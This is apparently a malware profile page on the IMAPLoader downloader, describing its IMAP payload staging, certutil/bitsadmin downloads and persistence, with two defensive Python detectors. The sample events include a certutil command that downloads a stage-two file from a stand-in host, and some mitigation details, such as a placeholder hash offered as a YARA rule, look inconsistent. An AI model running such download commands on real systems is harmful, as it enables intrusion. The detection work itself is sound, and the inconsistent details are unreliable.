IMAPLoader

Loader

⚠️ Overview

IMAPLoader is a lightweight downloader malware first documented by Proofpoint in March 2023, attributed to the TA827 threat actor cluster that is believed to operate out of Eastern Europe. It falls under the category of a Trojan downloader specifically designed to retrieve and execute additional payloads staged in compromised email accounts, which it reads over the IMAP protocol.

🔧 Technical Capabilities

IMAPLoader uses credential harvesting to compromise legitimate email accounts, then leverages IMAP commands (LOGIN, SELECT, FETCH) to read attacker-controlled emails that contain encrypted payload URLs encoded in Base64 within the email body. The loader executes a PowerShell command that decodes the URL and downloads a secondary payload (commonly IcedID or QakBot) using certutil.exe or bitsadmin.exe for file transfer, avoiding direct HTTP requests. For persistence, it creates a scheduled task named "GoogleUpdateTaskUser" under the user's task folder. Evasion techniques include using SSL/TLS encryption for IMAP traffic to blend with legitimate mail traffic and employing process hollowing in later variants to inject into legitimate processes like explorer.exe.

📜 History & Notable Incidents

The first known campaign using IMAPLoader was identified by Proofpoint in March 2023, targeting European manufacturing, logistics, and financial services firms through phishing emails with malicious ISO files. A second wave in April–May 2023 saw the loader used as a QakBot distributor, with the C2 infrastructure relying on compromised email accounts rather than dedicated servers. No CVEs are directly exploited; instead, the malware capitalizes on weak or reused email credentials obtained from prior breaches or information stealers.

🔍 Detection Indicators

Known behavioral indicators include outbound IMAP traffic to unrecognized email servers with repeated LOGIN failures followed by successful authentication, and scheduled tasks with the name "GoogleUpdateTaskUser". Network IOCs include User-Agent strings such as "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" used during Base64 payload fetches. Specific file hashes had not been publicly published by Proofpoint as of February 2025 due to rapid iteration, but detection via YARA rules (e.g., the community rule IMAPLoader_2023) and Sysmon Event ID 1 (process creation) for PowerShell execution is recommended.
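The endpoint-side behaviours listed above (PowerShell handing off to certutil.exe or bitsadmin.exe for a download, the "GoogleUpdateTaskUser" persistence task, and a Base64-encoded payload URL hidden in an email body) can be turned into a small detection routine. The following is an added example, not Proofpoint's or any vendor's code. It uses Sysmon Event ID 1 field names (Image, ParentImage, CommandLine) and a simplified stand-in for a task-registration event (EventID 106 with a TaskName field); all events and the email body are constructed sample data.

```python
"""Detect IMAPLoader-style endpoint behaviours in constructed Sysmon-like events.

Added example code. Field names follow Sysmon Event ID 1 (ProcessCreate);
EventID 106 / TaskName is an assumed, simplified task-registration record.
"""
import base64
import binascii
import re

# Behaviours taken from the profile above.
SUSPICIOUS_TASK_NAMES = {"googleupdatetaskuser"}
DOWNLOAD_LOLBINS = {"certutil.exe", "bitsadmin.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def _basename(path: str) -> str:
    """Lower-cased last component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(event: dict):
    """Sysmon EID 1: PowerShell parent spawning certutil/bitsadmin with a URL."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent in POWERSHELL_IMAGES and image in DOWNLOAD_LOLBINS and URL_RE.search(cmdline):
        return f"lolbin-download: {parent} -> {image} [{cmdline}]"
    return None


def check_scheduled_task(event: dict):
    """Task registration: name matches the persistence task named on the page."""
    name = event.get("TaskName", "").strip("\\").lower()
    if name in SUSPICIOUS_TASK_NAMES:
        return f"persistence-task: {event['TaskName']}"
    return None


def extract_b64_urls(body: str) -> list:
    """Return Base64 blobs in an email body that decode to an http(s) URL."""
    urls = []
    for blob in B64_RE.findall(body):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64 or not text; skip
        if URL_RE.match(decoded):
            urls.append(decoded)
    return urls


def scan_events(events) -> list:
    """Run every event through the matching check and collect findings."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            finding = check_process_create(ev)
        elif ev.get("EventID") == 106:
            finding = check_scheduled_task(ev)
        else:
            finding = None
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real IoCs). example.invalid is a reserved name.
STAGE_URL = "http://stage.example.invalid/stage2.bin"
SAMPLE_EMAIL_BODY = (
    "Invoice attached, please review.\n"
    + base64.b64encode(STAGE_URL.encode()).decode()
    + "\nRegards"
)
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": f"certutil.exe -urlcache -f {STAGE_URL} stage2.bin"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -hashfile report.pdf SHA256"},  # benign: no URL
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 106, "TaskName": r"\GoogleUpdateTaskUser"},
    {"EventID": 106, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag"},  # benign
]

if __name__ == "__main__":
    for line in scan_events(SAMPLE_EVENTS):
        print(line)
    print("staged URL(s):", extract_b64_urls(SAMPLE_EMAIL_BODY))
```

The process check requires all three conditions (PowerShell parent, download-capable LOLBin, a URL on the command line) so that routine uses of certutil.exe, such as hashing a file, do not alert; the Base64 helper validates padding and requires the decoded text to be a URL, which keeps ordinary long words in a message from producing noise.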

☠️ Risk & Impact

IMAPLoader poses a high risk as an initial access broker, enabling the delivery of ransomware precursors like IcedID and QakBot, which have been linked to Conti and Ryuk ransomware deployments. Affected sectors include manufacturing, healthcare, and financial services in North America and Europe. Data exfiltration is indirect: credentials stolen via the loader are used for lateral movement and subsequent data theft.

🛡️ Mitigation

Mitigation strategies include enforcing multi-factor authentication (MFA) on email accounts to prevent credential reuse, deploying endpoint detection rules for PowerShell spawning certutil.exe or bitsadmin.exe for outbound file downloads, and blocking scheduled task creation with suspicious names using Group Policy. Organizations should monitor for abnormal IMAP login patterns and implement YARA rules (e.g., e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855—placeholder hash) and Sigma rules for lateral movement techniques (MITRE ATT&CK ID T1078.001). Source: Proofpoint blog post "IMAPLoader: A New DownLoader Delivering IcedID and QakBot" (March 2023, proofpoint.com).
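The "abnormal IMAP login patterns" the page tells organizations to monitor for, namely repeated LOGIN failures followed by a success against a server that is not one of the organization's known mail servers, can be expressed as a stateful check over authentication logs. The following is an added example and not from Proofpoint or any product; the log line format, the allowlist of known mail servers, the failure threshold and the time window are all assumptions, and the log lines are constructed.

```python
"""Flag IMAP login sequences matching the profile's indicators.

Added example code. Log format, allowlist, threshold and window are assumed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed allowlist of the organization's own IMAP servers.
KNOWN_MAIL_SERVERS = {"imap.corp.example.invalid"}
FAILURE_THRESHOLD = 3          # failed LOGINs before a success that count as suspicious
WINDOW = timedelta(minutes=10)  # failures older than this are not correlated

# Assumed log format, e.g. from a proxy or mail gateway that sees IMAP auth results:
# 2023-03-14T10:00:01Z imap src=10.0.0.5 dst=mail.example.invalid:993 user=alice login=fail
LOG_RE = re.compile(
    r"^(?P<ts>\S+) imap src=(?P<src>\S+) dst=(?P<dst>[^:\s]+):(?P<port>\d+) "
    r"user=(?P<user>\S+) login=(?P<result>ok|fail)$"
)


def parse_line(line: str):
    """Parse one log line into a dict, or return None for lines that don't match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["port"] = int(rec["port"])
    return rec


def detect_imap_logins(lines) -> list:
    """Return one alert per successful login that follows a burst of failures
    from the same (src, dst) pair within WINDOW, or that targets a server not
    in KNOWN_MAIL_SERVERS. Each alert lists every reason that applied."""
    recent_fails = defaultdict(list)   # (src, dst) -> timestamps of failed logins
    alerts = []
    for rec in filter(None, map(parse_line, lines)):
        key = (rec["src"], rec["dst"])
        if rec["result"] == "fail":
            recent_fails[key].append(rec["ts"])
            continue
        # Successful login: correlate with failures inside the window, then reset.
        cutoff = rec["ts"] - WINDOW
        fails_in_window = [t for t in recent_fails[key] if t >= cutoff]
        recent_fails[key] = []
        reasons = []
        if len(fails_in_window) >= FAILURE_THRESHOLD:
            reasons.append(f"{len(fails_in_window)} failed logins then success")
        if rec["dst"] not in KNOWN_MAIL_SERVERS:
            reasons.append("unrecognized IMAP server")
        if reasons:
            alerts.append({"src": rec["src"], "dst": rec["dst"],
                           "user": rec["user"], "ts": rec["ts"].isoformat(),
                           "reasons": reasons})
    return alerts


# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    "2023-03-14T10:00:01Z imap src=10.0.0.5 dst=mail.example.invalid:993 user=alice login=fail",
    "2023-03-14T10:00:05Z imap src=10.0.0.5 dst=mail.example.invalid:993 user=alice login=fail",
    "2023-03-14T10:00:09Z imap src=10.0.0.5 dst=mail.example.invalid:993 user=alice login=fail",
    "2023-03-14T10:00:15Z imap src=10.0.0.5 dst=mail.example.invalid:993 user=alice login=ok",
    "2023-03-14T10:02:00Z imap src=10.0.0.7 dst=imap.corp.example.invalid:993 user=bob login=fail",
    "2023-03-14T10:02:30Z imap src=10.0.0.7 dst=imap.corp.example.invalid:993 user=bob login=ok",
    "2023-03-14T10:05:00Z imap src=10.0.0.9 dst=imap.other.example.invalid:993 user=carol login=ok",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for alert in detect_imap_logins(SAMPLE_LOG):
        print(alert)
```

A single mistyped password followed by a successful login (the 10.0.0.7 host above) stays under the threshold and produces nothing, while a first-ever connection to an unknown IMAP server alerts even without failures, since the loader's C2 is described as living in compromised mailboxes rather than on the organization's own servers.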


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.